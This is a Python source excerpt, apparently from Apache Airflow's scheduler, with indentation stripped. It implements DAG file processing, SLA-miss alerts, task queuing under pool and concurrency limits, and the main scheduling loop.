class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas])
blocking_task_list = "\n".join(
[ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis]
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(read_dags_from_db=True)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self, old_states: List[str], new_state: str, session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = (
session.query(models.TaskInstance)
.outerjoin(models.TaskInstance.dag_run)
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
.filter(models.TaskInstance.state.in_(old_states))
.filter(
or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
# pylint: disable=no-member
models.DagRun.state.is_(None),
)
)
)
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update(
{
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
}
)
tis_changed = (
session.query(models.TaskInstance)
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date == subq.c.execution_date,
)
.update(ti_prop_update, synchronize_session=False)
)
if tis_changed > 0:
session.flush()
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed,
new_state,
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join([repr(x) for x in task_instances_to_examine])
self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session
)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool,
open_slots,
num_ready,
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
)
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id,
current_dag_concurrency,
dag_concurrency_limit,
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance,
dag_id,
dag_concurrency_limit,
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so where we can avoid loading the full
# serialized DAG the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id
).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info(
"Not executing %s since the task concurrency for"
" this task has been reached.",
task_instance,
)
continue
if task_instance.pool_slots > open_slots:
self.log.info(
"Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance,
task_instance.pool_slots,
open_slots,
pool,
)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join([repr(x) for x in executable_tis])
self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False,
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = [
and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED,
)
for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
]
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id,
ti_key.task_id,
ti_key.execution_date,
state,
ti_key.try_number,
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = sched.scheduler()
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
timers.enter(delay, 1, repeat, args, kwargs)
timers.enter(delay, 1, repeat, arguments, kwargs)
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
